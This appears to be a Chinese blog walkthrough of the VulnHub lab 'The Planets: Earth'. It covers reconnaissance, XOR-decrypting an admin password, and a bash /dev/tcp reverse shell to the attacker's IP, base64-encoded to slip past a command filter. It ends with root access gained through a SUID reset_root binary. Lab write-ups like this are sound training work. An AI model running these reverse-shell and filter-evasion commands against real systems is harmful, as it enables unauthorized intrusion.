攻防一练(THE PLANETS: EARTH)
2024-1-10 17:40:33 Author: www.freebuf.com(查看原文) 阅读量:11 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

靶场下载地址:https://www.vulnhub.com/entry/the-planets-earth,755/

一、网络枚举

查看本机ip 192.168.78.128

ifconfig

1704875221_659e54d562187eb879461.png!small

扫描靶机ip

nmap -sP 192.168.78.0/24

1704875728_659e56d06d267aaed5c1f.png!small

靶机ip 192.168.78.132

扫描开放端口

nmap -p- 192.168.78.132

1704875962_659e57bacaa54573e99de.png!small

开放了 22 80 443 端口

二、信息收集

访问80端口

1704876083_659e583346f415c2c1c46.png!small

访问时出现404

重新扫描开放端口及信息

nmap -p- -sS -sV -A 192.168.78.132

1704876324_659e5924418d301d48610.png!small

扫描出来发现存在dns解析

修改配置文件

sudo vi /etc/hosts      在里面添加这两行代码

1704876381_659e595dd50bffa51e64d.png!small

访问这几个地址

http://earth.local

http://terratest.earth.local

https://earth.local

https://terratest.earth.local

访问发现前面三个页面都相同

1704876739_659e5ac329d74df707b4b.png!small

1704876790_659e5af6819f2642c1504.png!small

有一串加密字符,是XOR加密

第四个不同

1704876752_659e5ad0bea22dbf37252.png!small

没有其他可以利用信息

扫描目录

dirb http://earth.local

dirb http://terratest.earth.local

dirb https://terratest.earth.local

1704877040_659e5bf03a26baa9bf9f7.png!small

发现三个扫描出来都一样

访问  https://earth.local/admin

1704877145_659e5c59d57ec5b56c7b2.png!small

1704877160_659e5c685b8a6786a638f.png!small

是一个登录界面

继续扫描第四个

dirb https://terratest.earth.local

1704877298_659e5cf2cade9727b3d1d.png!small

扫描出来一个robots.txt文件

访问这个文件

1704877400_659e5d580fb74ee595359.png!small

发现最下面那个文件没有后缀,尝试使用txt后缀访问一下

1704877450_659e5d8a4323be460a3d4.png!small

发现一段话

翻译出来

测试安全消息系统注意事项:
*使用XOR加密作为算法,应该和RSA中使用的一样安全。
*地球已确认已收到我们发送的消息。
*testdata.txt 用于测试加密。
*terra 用作管理门户的用户名。
去做:
*我们如何安全地将每月的密钥发送到地球?或者我们应该每周更换一次钥匙?
*需要测试不同的密钥长度以防止暴力破解。钥匙应该多长?
*需要改进消息界面和管理面板的界面,目前还很基础。

得到一个用户名terra

破解上面加密的密文

1704877735_659e5ea76265130f4ea43.png!small

这里得到一串循环的字符串,大概率就是密码

earthclimatechangebad4humans

回到刚才的登录界面

1704877821_659e5efd4ae8697203963.png!small

成功登录

三、发现漏洞

1704877876_659e5f344692775abf8ea.png!small

这里是一个可以执行命令是输入框,很有可能存在漏洞

四、漏洞利用

尝试反弹shell

bash -c 'exec bash -i &>/dev/tcp/192.168.78.128/6666 <&1'

1704878069_659e5ff5ce4dc05a5473f.png!small

发现无法执行,这里很有可能存在敏感信息过滤,所以换一个方法

echo "bash -i &>/dev/tcp/192.168.78.128/6666 <&1" | base64    执行这个命令得到加密的密文

1704878191_659e606f2e28c76aff67b.png!small

在本地开启监听

nc -lvvp 6666

1704878277_659e60c5e63d65b6b6785.png!small

echo YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguNzguMTI4LzY2NjYgPCYxCg== | base64 -d | bash

这里是将刚才加密的密文进行解密,在刚才界面去执行这段代码

1704878381_659e612d2fe79631ab7c6.png!small

成功反弹shell

1704878406_659e6146f0621d27a6dcb.png!small

五、提权

find / -perm -u=s -type f 2>/dev/null     查看靶机中有权限的文件

1704878515_659e61b3e465fc3348a1b.png!small

发现一个reset_root文件应该是对root密码的管理

查看一下这个文件

cat /usr/bin/reset_root

1704878612_659e6214771294b0cc200.png!small

发现密码Earth

尝试登录一下

1704878718_659e627e5cfc78c1eee41.png!small

登录失败了

应该是执行的过程中出现了错误

将这个文件传回本机查看

本机开启监听

1704878859_659e630b9f896fdaa228d.png!small

靶机传回文件

1704878905_659e63399b28d551e32cb.png!small

成功拿到

1704878934_659e6356c30d9c3fbe204.png!small

ltrace跟踪库函数调用,发现缺少三个文件

1704879016_659e63a89470423e9f0e1.png!small

靶机创建这三个文件

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

1704879158_659e6436aff56b6399963.png!small

再重新登录

1704879227_659e647bb768fe8c5f7f9.png!small

提权成功

1704879256_659e64986ac9bd8d75ffa.png!small

成功拿到flag


文章来源: https://www.freebuf.com/vuls/389384.html
如有侵权请联系:admin#unsafe.sh